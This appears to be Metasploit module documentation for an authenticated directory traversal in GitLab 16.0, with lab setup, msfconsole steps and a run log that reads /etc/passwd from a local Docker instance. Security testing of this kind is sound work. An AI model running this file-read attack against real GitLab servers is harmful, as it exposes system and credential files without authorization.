## Vulnerable Application GitLab version 16.0 contains a directory traversal for arbitrary file read as the `gitlab-www` user. This module requires authentication for exploitation. In order to use this module, a user must be able to create a project and groups. When exploiting this vulnerability, there is a direct correlation between the traversal depth, and the depth of groups the vulnerable project is in. The minimum for this seems to be `5`, but up to `11` have also been observed. An example of this, is if the directory traversal needs a depth of `11`, a group and 10 nested child groups, each a sub of the previous, will be created (adding up to `11`). Visually this looks like: `Group1->child1->child2->child3->child4->child5->child6->child7->child8->child9->child10`. If the depth was `5`, a group and 4 nested child groups would be created. With all these requirements satisfied a dummy file is uploaded, and the full traversal is then executed. Cleanup is performed by deleting the first group which cascades to deleting all other objects created. Tested on a Docker image of GitLab 16.0 ### Install A Docker image is available: ``` sudo docker run --detach \ --hostname gitlab.example.com \ --publish 443:443 --publish 80:80 --publish 22:22 \ --name gitlab \ --restart always \ --volume $GITLAB_HOME/config:/etc/gitlab \ --volume $GITLAB_HOME/logs:/var/log/gitlab \ --volume $GITLAB_HOME/data:/var/opt/gitlab \ --shm-size 256m \ gitlab/gitlab-ee:16.0.0-ee.0 ``` To retrieve the default password: ``` sudo docker exec -it gitlab grep 'Password:' /etc/gitlab/initial_root_password ``` ## Verification Steps 1. Install the application 1. Start msfconsole 1. Do: `use auxiliary/scanner/http/gitlab_authenticated_subgroups_file_read` 1. Do: `set rhosts [ip]` 1. Do: `set username [username]` 1. DO: `set password [password]` 1. Do: `run` 1. You should be able to read an arbitrary file. ## Options ### DEPTH Depth for path traversal (also groups creation). 11 seems pretty safe but it may work with less. Defaults to `11`. ### FILE File to read. Defaults to `/etc/passwd` ## Scenarios ### Docker GitLab 16.0 ``` [*] Processing gitlab.rb for ERB directives. resource (gitlab.rb)> use auxiliary/gather/gitlab_authenticated_subgroups_file_read resource (gitlab.rb)> set rhosts 127.0.0.1 rhosts => 127.0.0.1 resource (gitlab.rb)> set username root username => root resource (gitlab.rb)> set password 9ADJtW5hHcrTYKDZ2yeQduyHyWuGUk7b9ikV/njVVC4= password => 9ADJtW5hHcrTYKDZ2yeQduyHyWuGUk7b9ikV/njVVC4= resource (gitlab.rb)> set verbose true verbose => true resource (gitlab.rb)> exploit [*] Running module against 127.0.0.1 [+] CSRF Token: dPAr4PTaCuwRU5-j-snq7FfX1V0qh7MoDguHWbUCXCPnwKK3azJXGaF5QxXjRtXkn2_ORLoEt8-NGf59fngrUg [*] Creating 11 groups [*] Creating group: GYS2KiLq [+] CSRF Token: RiloN6gmbtG6kHO55i7i0LFqaN38Bwd_EZCHW2Q9UcLVGeFgN84zJAq6rw__od3YedJzxGyEA5iSgv5_r0cmsw [*] Creating child group: YzJEBtNX with parent id: 2 [+] CSRF Token: uSAAt3_f4qbQtpxzkyI-vefpmQhh3vxFtee7I1bmVxUqEIng4De_U2CcQMWKrQG1L1GCEfFd-KI29cIHnZwgZA [*] Creating child group: kl9AGSEx with parent id: 3 [+] CSRF Token: ujc-Maz6zilT6D5fPjiq-s0CtVg9CYm43f71Eiu35I0pB7dmMxKT3OPC4uknt5XyBbquQa2KjV9e7Iw24M2T_A [*] Creating child group: 9QC5nfTB with parent id: 4 [+] CSRF Token: mkDq3WQ7BdDAfiO_INXVAZ7UOeNPlHXJqx0_0TfqmgwJcGOK-9NYJXBU_wk5WuoJVmwi-t8XcS4oD0b1_JDtfQ [*] Creating child group: ssHxNX3y with parent id: 5 [+] CSRF Token: -9mNSwNeTCTQ6EmVxDV4yAq1O7TvVbpvctLZJwO0d4Fo6QQcnLYR0WDClSPdukfAwg0grX_WvojxwKADyM4A8A [*] Creating child group: w7bktrEs with parent id: 6 [+] CSRF Token: bnozD-CZzDp00QJ9Fx9pVEcwg6QO_1iykxrRUg17NIH9SrpYf3GRz8T73ssOkFZcj4iYvZ58XFUQCKh2xgFD8A [*] Creating child group: uU8ELnQm with parent id: 7 [+] CSRF Token: l57r09_W7GDI5VXVZ5SS0BOatod1-HCZyZj2z3J_Ac8ErmKEQD6xlXjPiWN-G63Y2yKtnuV7dH5Kio_ruQV2vg [*] Creating child group: o23bujpZ with parent id: 8 [+] CSRF Token: 81sCdo47UC5diIjdq_uquTFpMwzNDnV-mG9RprW-ACdga4shEdMN2-2iVGuydJWx-dEoFV2NcZkbfSiCfsR3Vg [*] Creating child group: A3ksDjIZ with parent id: 9 [+] CSRF Token: SQAMHEjnus9-5Qk-leIXDxLUTDfpD6tfP5fTqgTodezaMIVL1w_nOs7P1YiMbSgH2mxXLnmMr7i8haqOz5ICnQ [*] Creating child group: fefAYofd with parent id: 10 [+] CSRF Token: wAeXzAb4bFXWLnys1qQ1HCgXtwPplB9ACCdTliQbWTpTNx6bmRAxoGYEoBrPKwoU4K-sGnkXG6eLNSqy72EuSw [*] Creating child group: d9ojqIJp with parent id: 11 [+] CSRF Token: Jmtw9u0oBZ-TbViSBqgoNaj5NI5hxeIhKb9SWtR-TL-1W_mhcsBYaiNHhCQfJxc9YEEvl_FG5saqrSt-HwQ7zg [*] Creating project WELLohsl [*] Creating a dummy file in project [*] Executing dir traversal [+] root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin sshd:x:101:65534::/run/sshd:/usr/sbin/nologin git:x:998:998::/var/opt/gitlab:/bin/sh gitlab-www:x:999:999::/var/opt/gitlab/nginx:/bin/false gitlab-redis:x:997:997::/var/opt/gitlab/redis:/bin/false gitlab-psql:x:996:996::/var/opt/gitlab/postgresql:/bin/sh mattermost:x:994:994::/var/opt/gitlab/mattermost:/bin/sh registry:x:993:993::/var/opt/gitlab/registry:/bin/sh gitlab-prometheus:x:992:992::/var/opt/gitlab/prometheus:/bin/sh gitlab-consul:x:991:991::/var/opt/gitlab/consul:/bin/sh [+] /etc/passwd saved to /root/.msf4/loot/20230602160435_default_127.0.0.1_GitLabfile_635783.txt [*] Deleting group GYS2KiLq [*] Auxiliary module execution completed ```